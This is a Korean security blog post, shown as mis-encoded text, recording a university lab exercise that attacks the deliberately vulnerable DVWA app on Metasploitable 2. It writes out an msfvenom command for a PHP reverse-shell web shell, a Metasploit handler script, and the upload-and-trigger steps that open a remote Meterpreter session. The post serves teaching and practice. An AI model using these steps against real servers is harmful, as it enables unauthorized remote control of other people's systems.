[๋ชจ์˜ํ•ดํ‚น] ์›น ์„œ๋น„์Šค ์ทจ์•ฝ์ ์„ ์ด์šฉํ•œ ํŒŒ์ผ ์—…๋กœ๋“œ ๊ณต๊ฒฉ

2025. 2. 11. 08:00ยท๐Ÿšจ ๋ณด์•ˆ ์‹ค๋ฌด/๋ชจ์˜ ํ•ดํ‚น
728x90
๋ฐ˜์‘ํ˜•

! ์ด ํฌ์ŠคํŠธ์˜ ๋‚ด์šฉ์€ (2019๋…„)  ์ „๊ณต ๊ฐ•์˜์—์„œ ๋‹ค๋ฃฌ ๋ฆฌ๋ˆ…์Šค ๋ณด์•ˆ ์‹ค์Šต์˜ ๊ธฐ๋ก์šฉ์ด๋ฉฐ, ์ด๋Š” ํ•™์Šต ๋ชฉ์ ์œผ๋กœ๋งŒ ์‚ฌ์šฉ๋˜์–ด์•ผ ํ•ฉ๋‹ˆ๋‹ค.

! ์–ด๋– ํ•œ ๊ฒฝ์šฐ์—๋„ ์ด๋Ÿฌํ•œ ๊ธฐ์ˆ ์„ ์•…์šฉํ•˜๊ฑฐ๋‚˜ ๋ถˆ๋ฒ•์ ์ธ ํ™œ๋™์— ์‚ฌ์šฉํ•ด์„œ๋Š” ์•ˆ ๋ฉ๋‹ˆ๋‹ค.

 

! ๋ชจ์˜ ํ•ดํ‚น๊ณผ ๊ด€๋ จ๋œ ์‹ค์Šต์€ ํ•ฉ๋ฒ•์ ์ธ ํ™˜๊ฒฝ์—์„œ๋งŒ ์ˆ˜ํ–‰๋˜์–ด์•ผ ํ•˜๋ฉฐ, ๋ฌด๋‹จ์œผ๋กœ ๋‹ค๋ฅธ ์‚ฌ๋žŒ์˜ ์‹œ์Šคํ…œ์— ์ ‘๊ทผํ•˜๋Š” ๋“ฑ์˜ ํ–‰์œ„๋Š” ๋ฒ•์ ์ธ ๋ฌธ์ œ๋กœ ์ด์–ด์งˆ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์ด๋Ÿฌํ•œ ๊ธฐ์ˆ ์„ ์‚ฌ์šฉํ•  ๋•Œ์—๋Š” ํ•ญ์ƒ ์œค๋ฆฌ์ ์ธ ์ฑ…์ž„์„ ๊ฐ–๊ณ  ํ–‰๋™ํ•ด์•ผ ํ•ฉ๋‹ˆ๋‹ค.

 

1๏ธโƒฃ ์‹ค์Šต ํ™˜๊ฒฝ ๊ตฌ์„ฑ ๋ฐ ์ค€๋น„

๐Ÿ”น1. ์‹ค์Šต ํ™˜๊ฒฝ ๊ตฌ์„ฑ

  • ``Metasploitable 2``: ์ทจ์•ฝํ•œ ์›น ์• ํ”Œ๋ฆฌ์ผ€์ด์…˜์ด ํฌํ•จ๋œ ํ…Œ์ŠคํŠธ์šฉ ๊ฐ€์ƒ ๋จธ์‹ 
  • ``DVWA``: ์›น ๋ณด์•ˆ ํ…Œ์ŠคํŠธ๋ฅผ ์œ„ํ•œ ์ทจ์•ฝํ•œ PHP ๊ธฐ๋ฐ˜ ์›น ์• ํ”Œ๋ฆฌ์ผ€์ด์…˜
  • ``Kali Linux``: ๊ณต๊ฒฉ์ž๊ฐ€ ์‚ฌ์šฉํ•  ์ˆ˜ ์žˆ๋Š” ์„œ๋ฒ„

๐Ÿ”น2. Metasploitable์˜ IP ์ฃผ์†Œ ํ™•์ธ

  • Metasploitable์˜ IP ์ฃผ์†Œ๋ฅผ ํ™•์ธํ•˜์—ฌ ์›น ์• ํ”Œ๋ฆฌ์ผ€์ด์…˜์— ์ ‘๊ทผํ•  ์ค€๋น„๋ฅผ ํ•œ๋‹ค.
ifconig


2๏ธโƒฃ DVWA ์„ค์ • ๋ฐ ์ ‘์†

๐Ÿ”น1. DVWA ์›น ํŽ˜์ด์ง€ ์ ‘์† ๋ฐ ์„ค์ • ๋ณ€๊ฒฝ

  • ์นผ๋ฆฌ ๋ฆฌ๋ˆ…์Šค์—์„œ ๋ธŒ๋ผ์šฐ์ €๋ฅผ ์—ด๊ณ  ``Metasploitable``์˜ IP ์ฃผ์†Œ๋ฅผ ์ž…๋ ฅํ•˜์—ฌ DVWA ์‚ฌ์ดํŠธ์— ์ ‘์†ํ•œ๋‹ค.

  • ๋กœ๊ทธ์ธ ํŽ˜์ด์ง€์—์„œ ๋‹ค์Œ๊ณผ ๊ฐ™์ด ์ž…๋ ฅํ•˜์—ฌ ๋กœ๊ทธ์ธํ•œ๋‹ค.
    • Username: ``admin``
    • Password: ``password``

  • ๋กœ๊ทธ์ธ ํ›„ ๋ณด์•ˆ ๋ ˆ๋ฒจ์„ ``Low``๋กœ ์„ค์ •ํ•œ๋‹ค.


2๏ธโƒฃ ํŒŒ์ผ ์—…๋กœ๋“œ ๊ณต๊ฒฉ ์‹ค์Šต

๐Ÿ”น1. ์•…์„ฑ ์›น์‰˜ ์ƒ์„ฑ ๋ฐ ์—…๋กœ๋“œ

์›น์‰˜ ์ƒ์„ฑ
  • Kali Linux์—์„œ ``msfvenom``์„ ์‚ฌ์šฉํ•˜์—ฌ ์•…์„ฑ PHP ํŽ˜์ด๋กœ๋“œ๋ฅผ ์ƒ์„ฑํ•œ๋‹ค.
msfvenom -p php/meterpreter/reverse_tcp lhost=[๊ณต๊ฒฉ์ž IP] lport=[๊ณต๊ฒฉ์ž ํฌํŠธ] -f raw

  • ์ƒ์„ฑ๋œ ์ฝ”๋“œ๋ฅผ ๋ณต์‚ฌํ•œ๋‹ค. ์ด ๋•Œ, ๋งจ ์•ž์— ``/*``์„ ์ œ์™ธํ•˜๊ณ  ๋ณต์‚ฌํ•œ๋‹ค.

  • ๋ณต์‚ฌํ•œ ์ฝ”๋“œ๋ฅผ ํŒŒ์ผ๋กœ ์ €์žฅํ•œ๋‹ค.
nano /tmp/webshell.php

 

DVWA์— ์›น์‰˜ ์—…๋กœ๋“œ
  • DVWA ์‚ฌ์ด๋“œ๋ฉ”๋‰ด์—์„œ ``UPLOAD``๋ฅผ ์„ ํƒ ํ›„ ``tmp/webshell.php`` ํŒŒ์ผ์„ ์—…๋กœ๋“œํ•œ๋‹ค.
  • ์—…๋กœ๋“œ๊ฐ€ ์„ฑ๊ณตํ•˜๋ฉด ์›น์‰˜์ด ์„œ๋ฒ„์— ์ €์žฅ๋œ๋‹ค.
  • ๋งŒ์•ฝ ๋ณด์•ˆ ๋ ˆ๋ฒจ์ด ๋†’์œผ๋ฉด php ํŒŒ์ผ์ด ์—…๋กœ๋“œ ๋ถˆ๊ฐ€ํ•˜๋‹ค.


๐Ÿ”น2. ๋ฉ€ํ‹ฐ ํ•ธ๋“ค๋Ÿฌ ์„ค์ • ๋ฐ ๊ณต๊ฒฉ ์‹คํ–‰

๋ฉ€ํ‹ฐ ํ•ธ๋“ค๋Ÿฌ ์„ค์ •
  • Kali Linux์—์„œ ``msfconsole``์„ ์‹คํ–‰ํ•˜๊ณ , ์›๊ฒฉ ์ ‘์†์„ ๋Œ€๊ธฐํ•˜๋Š” ๋ฆฌ์Šค๋„ˆ๋ฅผ ์„ค์ •ํ•œ๋‹ค.
nano /root/webshell.rc
  • ์•„๋ž˜ ๋‚ด์šฉ๊ณผ ๊ฐ™์ด msfconsole ๋ช…๋ น์–ด๋ฅผ ์ž…๋ ฅ ํ›„ ์ €์žฅํ•œ๋‹ค.
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost [๊ณต๊ฒฉ์ž IP]
set lport [๊ณต๊ฒฉ์ž Port]
exploit

 

๊ณต๊ฒฉ ์‹คํ–‰
  • ์„ค์ •๋œ ๋ฆฌ์Šค๋„ˆ ์‹คํ–‰ํ•œ๋‹ค.
msfconsole -r /root/webshell.rc

  • ๋ธŒ๋ผ์šฐ์ €์—์„œ ์—…๋กœ๋“œ๋œ ์›น์‰˜์— ์ ‘๊ทผํ•˜์—ฌ ์‹คํ–‰ํ•œ๋‹ค.
http://[URL]/dvwa/hackable/uploads/webshell.php

  • Kali Linux์˜ ``msfconsole``์—์„œ Meterpreter ์„ธ์…˜์ด ํ™œ์„ฑํ™”๋˜๋ฉด์„œ ์›๊ฒฉ ์ ‘์†์ด ๊ฐ€๋Šฅํ•ด์ง„๋‹ค.


 

728x90
๋ฐ˜์‘ํ˜•

'๐Ÿšจ ๋ณด์•ˆ ์‹ค๋ฌด > ๋ชจ์˜ ํ•ดํ‚น' ์นดํ…Œ๊ณ ๋ฆฌ์˜ ๋‹ค๋ฅธ ๊ธ€

[๋ชจ์˜ํ•ดํ‚น] John the Ripper๋ฅผ ํ™œ์šฉํ•œ ํŒจ์Šค์›Œ๋“œ ํ•ด์‹œ ํฌ๋ž™  (0) 2025.02.28
[๋ชจ์˜ํ•ดํ‚น] ์›น ์„œ๋น„์Šค ์ทจ์•ฝ์ ์„ ์ด์šฉํ•œ ๋””๋ ‰ํ† ๋ฆฌ ์ด๋™ ๊ณต๊ฒฉ  (0) 2025.02.11
[๋ชจ์˜ํ•ดํ‚น] setoolkit์„ ์ด์šฉํ•œ ํ”ผ์‹ฑ์‚ฌ์ดํŠธ ๋งŒ๋“ค๊ธฐ  (0) 2025.02.11
[๋ชจ์˜ํ•ดํ‚น] Windows 2000 ๊ธฐ๋ฐ˜์˜ ์šด์˜์ฒด์ œ ์นจํˆฌํ•˜๊ธฐ  (0) 2025.02.10
[๋ชจ์˜ํ•ดํ‚น] ์œ ๋‹‰์Šค/๋ฆฌ๋ˆ…์Šค ๊ธฐ๋ฐ˜์˜ ์šด์˜์ฒด์ œ ์นจํˆฌ  (0) 2025.02.06
'๐Ÿšจ ๋ณด์•ˆ ์‹ค๋ฌด/๋ชจ์˜ ํ•ดํ‚น' ์นดํ…Œ๊ณ ๋ฆฌ์˜ ๋‹ค๋ฅธ ๊ธ€
  • [๋ชจ์˜ํ•ดํ‚น] John the Ripper๋ฅผ ํ™œ์šฉํ•œ ํŒจ์Šค์›Œ๋“œ ํ•ด์‹œ ํฌ๋ž™
  • [๋ชจ์˜ํ•ดํ‚น] ์›น ์„œ๋น„์Šค ์ทจ์•ฝ์ ์„ ์ด์šฉํ•œ ๋””๋ ‰ํ† ๋ฆฌ ์ด๋™ ๊ณต๊ฒฉ
  • [๋ชจ์˜ํ•ดํ‚น] setoolkit์„ ์ด์šฉํ•œ ํ”ผ์‹ฑ์‚ฌ์ดํŠธ ๋งŒ๋“ค๊ธฐ
  • [๋ชจ์˜ํ•ดํ‚น] Windows 2000 ๊ธฐ๋ฐ˜์˜ ์šด์˜์ฒด์ œ ์นจํˆฌํ•˜๊ธฐ
WISHee
WISHee
IT์™€ ๋ณด์•ˆ์— ๋Œ€ํ•œ ๊ณต๋ถ€ ๊ธฐ๋ก์„ ์ฐจ๊ณก์ฐจ๊ณก ์Œ“์•„๊ฐ€๋Š” ๊ธฐ์ˆ  ๋ธ”๋กœ๊ทธ ๐Ÿ›ก๏ธ๐Ÿ’ป
  • WISHee
    DevwithWish
    WISHee
  • ์ „์ฒด
    ์˜ค๋Š˜
    ์–ด์ œ
    • ๐ŸŒณ ROOT (128)
      • โ›“๏ธ ๋„คํŠธ์›Œํฌ ๋ณด์•ˆ (10)
        • ๊ธฐ๋ณธ ๊ฐœ๋… (9)
        • ํŒจํ‚ท ๋ถ„์„ (1)
        • ์นจ์ž… ํƒ์ง€ ๋ฐ ๋ฐฉ์ง€ (0)
      • โš™๏ธ ์‹œ์Šคํ…œ ๋ณด์•ˆ (0)
        • ์šด์˜์ฒด์ œ ๋ณด์•ˆ (0)
        • ์ทจ์•ฝ์  ๋ถ„์„ (0)
        • ๋กœ๊ทธ ๋ถ„์„ (0)
      • ๐ŸŒ ์›น ๋ณด์•ˆ (1)
        • OWASP TOP 10 (1)
        • ์›น ์„œ๋ฒ„ ๋ณด์•ˆ (0)
        • ์›น ์ทจ์•ฝ์  ๋ถ„์„ (0)
      • โ˜๏ธ ํด๋ผ์šฐ๋“œ ๋ณด์•ˆ (3)
        • AWS (3)
      • ๐Ÿ” ์•”ํ˜ธํ™” & ์ธ์ฆ (3)
        • ์•”ํ˜ธํ™” ๊ฐœ๋… (2)
        • TLS,SSL (0)
        • ์ธ์ฆ & ์ ‘๊ทผ์ œ์–ด (1)
      • ๐Ÿšจ ๋ณด์•ˆ ์‹ค๋ฌด (30)
        • ๋ณด์•ˆ ๊ด€์ œ (14)
        • ๋ชจ์˜ ํ•ดํ‚น (12)
        • ์ทจ์•ฝ์  ์ง„๋‹จ (3)
        • ๋””์ง€ํ„ธํฌ๋ Œ์‹ (1)
      • ๐Ÿ“š ISMS & ISO27001 (9)
        • ISMS, ISMS-P ์ธ์ฆ (2)
      • ๐Ÿ“ฐ ๋ณด์•ˆ ๋‰ด์Šค & ํŠธ๋ Œ๋“œ (1)
        • ์ตœ์‹  ๋ณด์•ˆ ์ด์Šˆ (1)
        • ์‚ฌ์ด๋ฒ„ ์œ„ํ˜‘ ์ •๋ณด (0)
        • ๋ณด์•ˆ ์ปจํผ๋Ÿฐ์Šค ๋ฆฌ๋ทฐ (0)
      • ๐Ÿ”ฅ SKShieldusRookies (15)
        • Review (3)
        • PBL (0)
        • ๊ณผ์ œ (4)
        • ๋ชจ๋“ˆ ํ”„๋กœ์ ํŠธ (8)
        • ์ตœ์ข… ํ”„๋กœ์ ํŠธ (0)
      • ๐Ÿ—‚๏ธ Project (3)
        • SOAR (0)
        • BlockChain (3)
      • ๐Ÿงฉ Language (23)
        • Java (1)
        • Python (16)
        • Programmers (6)
      • ๐Ÿ‘ฅ ๋ฒ„์ „๊ด€๋ฆฌ & ํ˜‘์—…๋„๊ตฌ (9)
        • Git, GitHub (4)
        • etc (5)
      • ๐Ÿ’œ ์ผ์ƒ (21)
        • Boot Camp (4)
        • Study (6)
        • Travel (8)
        • Study Abroad (3)
  • ๋ธ”๋กœ๊ทธ ๋ฉ”๋‰ด

    • ํ™ˆ
    • ํƒœ๊ทธ
    • ๋ฐฉ๋ช…๋ก
  • ๋งํฌ

    • GitHub
  • ๊ณต์ง€์‚ฌํ•ญ

    • ๋ฐ˜๊ฐ‘์Šต๋‹ˆ๋‹ค!
  • ์ธ๊ธฐ ๊ธ€

  • ํƒœ๊ทธ

    ํ”„๋กœ๊ทธ๋ž˜๋จธ์Šค
    ํ•ด์™ธ์—ฌํ–‰
    ํŒŒ์ด์ฌ
    flask
    ํ•œ๋‹ฌ์—ฌํ–‰
    sk์‰ด๋”์Šค๋ฃจํ‚ค์ฆˆ
    ์™€์ด์–ด์ƒคํฌ
    ๊นƒํ—ˆ๋ธŒ
    ๋ชฝ์ƒ๋ฏธ์…ธ
    ํ˜‘์—…๋„๊ตฌ
    ๋ณด์•ˆ์‹ค์Šต
    ์œ ๋Ÿฝ์—ฌํ–‰
    ์นผ๋ฆฌ๋ฆฌ๋ˆ…์Šค
    ๋Ÿฐ๋˜์—ฌํ–‰
    ํŒŒ๋ฆฌ์—ฌํ–‰
    Github
    ์˜นํ”Œ๋ขฐ๋ฅด
    ๋ฆฌ๋ˆ…์Šค๋ณด์•ˆ
    ํ”Œ๋ผ์Šคํฌ
    ์œ ๋Ÿฝํ•œ๋‹ฌ์—ฌํ–‰
    ํ”„๋ž‘์Šค์—ฌํ–‰
    ๋ชจ์˜ํ•ดํ‚น
    Python
    git
    ์œˆ๋„์šฐ๋ณด์•ˆ
    VSCode
    ์ฝ”๋”ฉํ…Œ์ŠคํŠธ
    slack
    ๋ธ”๋ก์ฒด์ธ์‹ค์Šต
    ์ •๋ณด๋ณด์•ˆ
  • ์ตœ๊ทผ ๋Œ“๊ธ€

  • ์ตœ๊ทผ ๊ธ€

  • 160x600
    250x250
  • hELLOยท Designed By์ •์ƒ์šฐ.v4.10.3
WISHee
[๋ชจ์˜ํ•ดํ‚น] ์›น ์„œ๋น„์Šค ์ทจ์•ฝ์ ์„ ์ด์šฉํ•œ ํŒŒ์ผ ์—…๋กœ๋“œ ๊ณต๊ฒฉ
์ƒ๋‹จ์œผ๋กœ

ํ‹ฐ์Šคํ† ๋ฆฌํˆด๋ฐ”